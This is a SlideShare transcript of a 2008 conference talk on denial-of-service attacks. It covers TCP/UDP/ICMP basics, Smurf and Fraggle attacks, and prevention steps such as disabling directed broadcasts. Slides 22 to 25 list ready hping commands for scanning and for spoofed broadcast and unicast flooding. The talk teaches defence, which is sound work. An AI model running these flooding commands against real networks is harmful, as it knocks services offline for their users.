Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
By  Masood Ahmad Shah BLOG:  http://www.weblogs.com.pk/jahil/ CHASE-2008 LAHORE
Presentation Outline
Introduction <ul><li>The Internet is full of jerks </li></ul><ul><li>Sometimes those jerks will consume your available Int...
What’s  a network attack? <ul><li>An attempt to make a computer resource unavailable to its intended users. </li></ul><ul>...
How is This Accomplished? <ul><li>Obstruct the communication media between the intended users and the victim so that they ...
What’s the Goal Then? <ul><li>Understand how a denial of service attack works. </li></ul><ul><li>Configure a network devic...
What is Internet Protocol & TCP/IP? <ul><li>The Internet protocol suite is the set of communications protocols that implem...
How Internet Infrastructure Works
What is TCP? <ul><li>TCP is used extensively by many of the Internet's most popular application (WWW FTP TELNET) </li></ul...
What is UDP? <ul><li>UDP does not guarantee reliability or ordering in the way that TCP does.  </li></ul><ul><li>Datagrams...
What is ICMP? <ul><li>It is used by networked devices operating systems to send error messages—indicating, for instance, t...
TCP-UDP_TCP/IP Data Flow
TCP/UDP <ul><li>The figure shows the path of data from an application in one system to another application in a remote sys...
Trends <ul><li>Significant increase in network-based Denial-of-Service attacks over the last year </li></ul><ul><ul><li>At...
Goals of Attacks <ul><li>Prevent another user from using network connection </li></ul><ul><ul><li>“ Smurf” and “Fraggle” a...
“ Smurf” and “Fraggle” <ul><li>Very dangerous attacks </li></ul><ul><ul><li>Network-based, fills access pipes </li></ul></...
Smurf Attack
Tools for Attacks <ul><li>dsniff  </li></ul><ul><ul><li>http://monkey.org/~dugsong/dsniff/ </li></ul></ul><ul><li>sing </l...
Which attack tool is best for me? <ul><li>hping  ( http://www.hping.org ) </li></ul><ul><li>hping is a free packet generat...
Why hping? <ul><li>The reason I chose to learn this tool is very simple. I was curious as to how the people who were attem...
Using hping to Craft TCP/UDP/ICMP Packets <ul><li>Crafting TCP packets is the default behavior of hping.  By specifying th...
Using hping to Craft TCP Packets (Contd) <ul><li>Host Discovery </li></ul><ul><ul><li>Jahil-bsd#  hping  -1  192.168.0.x -...
Using hping to Craft TCP Packets (Contd) <ul><li>-S (SYN) –A (ACK) –R (RST) –F (FIN) </li></ul><ul><ul><li>Jahil-bsd# hpin...
Traffic Flooding using hping <ul><li>Broadcast Traffic Flooding </li></ul><ul><ul><li>jahil-bsd#  hping -1 192.168.0.255 –...
Traffic Flooding using hping (Contd) <ul><li>Unicast Flooding </li></ul><ul><ul><li>jahil-bsd#  hping -1 192.168.0.1 –i u1...
Prevention Techniques  <ul><li>How to prevent being a “bounce site” in a “Smurf” or “Fraggle” attack: </li></ul><ul><ul><l...
<ul><li>Use firewall features that detect and block flood traffic </li></ul><ul><ul><li>Many firewalls provide features th...
Thanks <ul><li>Questions </li></ul><ul><li>? </li></ul>
Upcoming SlideShare
Loading in …5
×

Exploiting Network Protocols To Exhaust Bandwidth Links 2008 Final

3,640 views

Published on

Published in: Technology
  • Be the first to comment

Exploiting Network Protocols To Exhaust Bandwidth Links 2008 Final

  1. 1. By Masood Ahmad Shah BLOG: http://www.weblogs.com.pk/jahil/ CHASE-2008 LAHORE
  2. 2. Presentation Outline
  3. 3. Introduction <ul><li>The Internet is full of jerks </li></ul><ul><li>Sometimes those jerks will consume your available Internet-facing bandwidth, or overpower your CPU, in an attempt to take you offline </li></ul><ul><li>We call this a Denial of Service attack </li></ul>
  4. 4. What’s a network attack? <ul><li>An attempt to make a computer resource unavailable to its intended users. </li></ul><ul><ul><ul><li>Web servers stop serving web pages </li></ul></ul></ul><ul><ul><ul><li>Email servers stop accepting or delivering e-mail </li></ul></ul></ul><ul><ul><ul><li>DNS servers stop resolving domain names </li></ul></ul></ul><ul><ul><ul><li>In general, servers stop serving </li></ul></ul></ul><ul><li>The end result is those users keep calling you until they can get their email </li></ul>
  5. 5. How is This Accomplished? <ul><li>Obstruct the communication media between the intended users and the victim so that they can no longer communicate adequately. </li></ul><ul><li>Force the victim computer to reset or consume its resources such that it can no longer provide its intended service. </li></ul>
  6. 6. What’s the Goal Then? <ul><li>Understand how a denial of service attack works. </li></ul><ul><li>Configure a network device to mitigate the effects of a denial of service attack </li></ul><ul><li>Try not to break anything in the process, and make it as transparent to the end user as possible. </li></ul>
  7. 7. What is Internet Protocol & TCP/IP? <ul><li>The Internet protocol suite is the set of communications protocols that implement the protocol stack on which the Internet and most commercial networks run. </li></ul><ul><li>It has also been referred to as the TCP/IP protocol suite, which is named after two of the most important protocols in it: the Transmission Control Protocol (TCP) and the Internet Protocol (IP), which were also the first two networking protocols defined. </li></ul>
  8. 8. How Internet Infrastructure Works
  9. 9. What is TCP? <ul><li>TCP is used extensively by many of the Internet's most popular application (WWW FTP TELNET) </li></ul><ul><li>TCP provides reliable, in-order delivery of a stream of bytes, making it suitable for applications like file transfer and e-mail. </li></ul><ul><li>TCP is a reliable stream delivery service that guarantees to deliver a stream of data sent from one host to another without duplication or losing data. </li></ul><ul><li>Since packet transfer is not reliable, a technique known as positive acknowledgment with retransmission, is used to guarantee reliability of packet transfers. </li></ul>
  10. 10. What is UDP? <ul><li>UDP does not guarantee reliability or ordering in the way that TCP does. </li></ul><ul><li>Datagrams may arrive out of order, appear duplicated, or go missing without notice. </li></ul><ul><li>UDP's stateless nature is also useful for servers that answer small queries from huge numbers of clients. Unlike TCP, UDP is compatible with packet broadcast (sending to all on local network) and multicasting (send to all subscribers). </li></ul>
  11. 11. What is ICMP? <ul><li>It is used by networked devices operating systems to send error messages—indicating, for instance, that a requested service is not available or that a host or router could not be reached. </li></ul><ul><li>ICMP is not used to send and receive data between end systems. </li></ul><ul><li>It is usually not used directly by user network applications, with some notable exceptions being the ping tool and traceroute. </li></ul>
  12. 12. TCP-UDP_TCP/IP Data Flow
  13. 13. TCP/UDP <ul><li>The figure shows the path of data from an application in one system to another application in a remote system. </li></ul><ul><li>The application's write request causes the data to be copied from the application's working segment to the socket send buffer. </li></ul><ul><li>The socket layer or subsystem gives the data to UDP or TCP. </li></ul><ul><li>If the size of the data is larger than the maximum transfer unit (MTU) of the LAN, </li></ul><ul><ul><li>TCP breaks the output into segments that comply with the MTU limit. </li></ul></ul><ul><ul><li>UDP leaves the breaking up of the output to the IP layer. </li></ul></ul><ul><li>If necessary, IP fragments the output into pieces that comply with the MTU. </li></ul><ul><li>The Interface layer ensures that no outgoing packet exceeds the MTU limit. </li></ul><ul><li>The packets are put on the device output queue and transmitted by the LAN adapter to the receiving system. </li></ul><ul><li>Arriving packets are placed on the device driver's receive queue, and pass through the Interface layer to IP. </li></ul><ul><li>If IP in the receiving system determines that IP in the sending system had fragmented a block of data, it coalesces the fragments into their original form and passes the data to TCP or UDP. </li></ul><ul><ul><li>TCP reassembles the original segments and places the input in the socket receive buffer. </li></ul></ul><ul><ul><li>UDP simply passes the input on to the socket receive buffer. </li></ul></ul><ul><li>When the application makes a read request, the appropriate data is copied from the socket receive buffer in kernel memory into the buffer in the application's working segment. </li></ul>
  14. 14. Trends <ul><li>Significant increase in network-based Denial-of-Service attacks over the last year </li></ul><ul><ul><li>Attackers’ growing accessibility to networks </li></ul></ul><ul><ul><li>Growing number of organizations connected to networks </li></ul></ul><ul><li>Vulnerability </li></ul><ul><ul><li>Most networks have not implemented spoof prevention filters </li></ul></ul><ul><ul><li>Very little protection currently implemented against attacks </li></ul></ul>
  15. 15. Goals of Attacks <ul><li>Prevent another user from using network connection </li></ul><ul><ul><li>“ Smurf” and “Fraggle” attacks, “pepsi” (UDP floods), ping floods </li></ul></ul><ul><li>Disable a host or service </li></ul><ul><ul><li>“ Land”, “Teardrop”, “NewTear”, “Bonk”, “Boink”, SYN flooding, “Ping of death” </li></ul></ul><ul><li>Traffic monitoring </li></ul><ul><ul><li>Sniffing </li></ul></ul>
  16. 16. “ Smurf” and “Fraggle” <ul><li>Very dangerous attacks </li></ul><ul><ul><li>Network-based, fills access pipes </li></ul></ul><ul><ul><li>Uses ICMP echo/reply (smurf) or UDP echo (fraggle) packets with broadcast networks to multiply traffic </li></ul></ul><ul><ul><li>Requires the ability to send spoofed packets </li></ul></ul><ul><li>Abuses “bounce-sites” to attack victims </li></ul><ul><ul><li>Traffic multiplied by a factor of 50 to 200 </li></ul></ul><ul><ul><li>Low-bandwidth source can kill high-bandwidth connections </li></ul></ul><ul><li>Similar traffic content to ping, UDP flooding but more dangerous due to traffic multiplication </li></ul>
  17. 17. Smurf Attack
  18. 18. Tools for Attacks <ul><li>dsniff </li></ul><ul><ul><li>http://monkey.org/~dugsong/dsniff/ </li></ul></ul><ul><li>sing </li></ul><ul><ul><li>http://sourceforge.net/projects/sing/ </li></ul></ul><ul><li>hping </li></ul><ul><ul><li>http://www.hping.org/ </li></ul></ul><ul><li>netcat </li></ul><ul><ul><li>http://netcat.sourceforge.net/ </li></ul></ul>
  19. 19. Which attack tool is best for me? <ul><li>hping ( http://www.hping.org ) </li></ul><ul><li>hping is a free packet generator and analyzer for the TCP/IP protocol. Hping is one of the de facto tools for security auditing and testing of firewalls and networks, and was used to exploit the idle scan scanning technique (also invented by the hping author), and now implemented in the Nmap Security Scanner. The new version of hping, hping3, is scriptable using the Tcl language and implements an engine for string based, human readable description of TCP/IP packets, so that the programmer can write scripts related to low level TCP/IP packet manipulation and analysis in very short time. </li></ul><ul><li>Like most tools used in computer security, hping is useful to both system administrators and crackers (or script kiddies). </li></ul>
  20. 20. Why hping? <ul><li>The reason I chose to learn this tool is very simple. I was curious as to how the people who were attempting to gain access to our networks were going about it. One of the ways is packet crafting. Crafting packets will allow you to probe firewall rule-sets and find entry points into the targeted system or network. </li></ul><ul><li>The sheer versatility of this tool though is what makes it stand out from the crowd. It is not only the king of the hill when it comes to crafting packets. This will also show you how to interpret the various conventions of TCP/IP. You will learn how the guts of the stack works by crafting packets. </li></ul><ul><ul><li>Firewall testing </li></ul></ul><ul><ul><li>Advanced port scanning </li></ul></ul><ul><ul><li>Network testing, using different protocols, TOS, fragmentation </li></ul></ul><ul><ul><li>Manual path MTU discovery </li></ul></ul><ul><ul><li>Advanced traceroute, under all the supported protocols </li></ul></ul><ul><ul><li>Remote OS fingerprinting </li></ul></ul><ul><ul><li>Remote uptime guessing </li></ul></ul><ul><ul><li>TCP/IP stacks auditing </li></ul></ul>
  21. 21. Using hping to Craft TCP/UDP/ICMP Packets <ul><li>Crafting TCP packets is the default behavior of hping. By specifying the TCP flags, a destination port and a target IP address, one can easily construct TCP packets. </li></ul><ul><li>-F --fin set FIN flag </li></ul><ul><li>-S --syn set SYN flag </li></ul><ul><li>-R --rst set RST flag </li></ul><ul><li>-P --push set PUSH flag </li></ul><ul><li>-A --ack set ACK flag </li></ul><ul><li>-U --urg set URG flag </li></ul>
  22. 22. Using hping to Craft TCP Packets (Contd) <ul><li>Host Discovery </li></ul><ul><ul><li>Jahil-bsd# hping -1 192.168.0.x --rand-dest -I de0 </li></ul></ul><ul><ul><li>c:> for /L %x in (1,1,254) do @ping 192.168.0.%x -w 100 -n 1 | find &quot;Reply“ </li></ul></ul><ul><li>Port Scanning </li></ul><ul><ul><li>Jahil-bsd# hping –S 192.168.0.10 -p ++20 </li></ul></ul><ul><ul><li>Jahil-bsd# hping –8 20-25 –S 192.168.0.10 </li></ul></ul><ul><ul><li>Jahil-bsd# hping –2 192.168.0.10 –p 80 –c 2 </li></ul></ul><ul><ul><li>Jahil-bsd# hping -1 10.10.56.37 -C 8 </li></ul></ul><ul><li>Traceroute </li></ul><ul><ul><li>Jahil-bsd# hping -2 192.168.10.25 -p ++4444 -T -n -c 6 </li></ul></ul><ul><ul><li>Jahil-bsd# hping -S 192.168.10.25 –p 53 -T </li></ul></ul><ul><ul><li>Jahil-bsd# hping -1 10.10.56.37 –T </li></ul></ul>
  23. 23. Using hping to Craft TCP Packets (Contd) <ul><li>-S (SYN) –A (ACK) –R (RST) –F (FIN) </li></ul><ul><ul><li>Jahil-bsd# hping –S 192.168.0.1 </li></ul></ul><ul><ul><li>Jahil-bsd# hping –A 192.168.0.1 </li></ul></ul><ul><ul><li>Jahil-bsd# hping –R 192.168.0.1 </li></ul></ul><ul><ul><li>Jahil-bsd# hping –R 192.168.0.1 </li></ul></ul><ul><ul><li>Jahil-bsd# hping –S 192.168.0.1 -p 80 </li></ul></ul><ul><ul><li>Jahil-bsd# hping –A 192.168.0.1 -p 25 </li></ul></ul><ul><li>UDP/ICMP </li></ul><ul><ul><li>Jahil-bsd# hping –2 192.168.0.10 –p 80 </li></ul></ul><ul><ul><li>Jahil-bsd# hping –2 192.168.0.10 –p 80 –d 1450 </li></ul></ul><ul><ul><li>Jahil-bsd# hping –2 192.168.0.10 –p 80 –d 8000 </li></ul></ul><ul><ul><li>Jahil-bsd# hping –2 192.168.0.10 -p 53 </li></ul></ul><ul><ul><li>Jahil-bsd# hping –1 192.168.0.10 –C 8 </li></ul></ul>
  24. 24. Traffic Flooding using hping <ul><li>Broadcast Traffic Flooding </li></ul><ul><ul><li>jahil-bsd# hping -1 192.168.0.255 –i u10000 –d 1472 (10 packets per second) </li></ul></ul><ul><ul><li>Jahil-bsd# hping -2 192.168.0.255 –i u1000 –p 53 (100 packets per second) </li></ul></ul><ul><ul><li>Jahil-bsd hping -S 192.168.0.255 -p 80 --flood </li></ul></ul><ul><ul><li>Jahil-bsd# hping -2 192.168.0.255 –a 192.168.0.254 -p 53 –-flood </li></ul></ul><ul><ul><li>Jahil-bsd# hping -2 192.168.0.255 –a 10.10.10.10 -p 53 –-flood </li></ul></ul><ul><ul><li>Jahil-bsd# hping -2 192.168.0.255 --rand-source-p 53 –-flood </li></ul></ul>
  25. 25. Traffic Flooding using hping (Contd) <ul><li>Unicast Flooding </li></ul><ul><ul><li>jahil-bsd# hping -1 192.168.0.1 –i u10000 –d 1472 (10 packets per second) </li></ul></ul><ul><ul><li>Jahil-bsd# hping -2 192.168.0.1 –i u1000 –p 53 (100 packets per second) </li></ul></ul><ul><ul><li>Jahil-bsd hping -S 192.168.0.1 -p 80 --flood </li></ul></ul><ul><ul><li>Jahil-bsd# hping -2 192.168.0.1 –a 192.168.0.254 -p 53 –-flood </li></ul></ul><ul><ul><li>Jahil-bsd# hping -2 192.168.0.1 –a 10.10.10.10 -p 53 –-flood </li></ul></ul><ul><ul><li>Jahil-bsd# hping -2 192.168.0.1 --rand-source-p 53 –-flood </li></ul></ul>
  26. 26. Prevention Techniques <ul><li>How to prevent being a “bounce site” in a “Smurf” or “Fraggle” attack: </li></ul><ul><ul><li>Turn off directed broadcasts to networks: </li></ul></ul><ul><ul><ul><li>Cisco: Interface command “no ip directed-broadcast” </li></ul></ul></ul><ul><ul><ul><li>Junos: JUNOS does not forward directed broadcast message. </li></ul></ul></ul><ul><ul><ul><li>Proteon: IP protocol configuration “disable directed-broadcast” </li></ul></ul></ul><ul><ul><ul><li>Bay Networks: Set a false static ARP address for bcast address </li></ul></ul></ul><ul><ul><ul><li>3Com: SETDefault -IP CONTrol = NoFwdSubnetBcast </li></ul></ul></ul><ul><ul><li>Use access control lists (if necessary) to prevent ICMP echo requests from entering your network </li></ul></ul><ul><ul><li>Configure host machines to not reply to broadcast ICMP echos </li></ul></ul>
  27. 27. <ul><li>Use firewall features that detect and block flood traffic </li></ul><ul><ul><li>Many firewalls provide features that can detect and block UDP and TCP SYN floods. </li></ul></ul><ul><li>Unicast RPF checking </li></ul><ul><li>Inter-provider Cooperation </li></ul><ul><ul><li>Network Operations Centers should publish proper procedures for getting filters put in place and tracing started </li></ul></ul><ul><ul><li>Good clients are not utilizing full available bandwidth </li></ul></ul><ul><ul><li>Bad clients are utilizing full available bandwidth  </li></ul></ul>Prevention Techniques (Contd)
  28. 28. Thanks <ul><li>Questions </li></ul><ul><li>? </li></ul>

×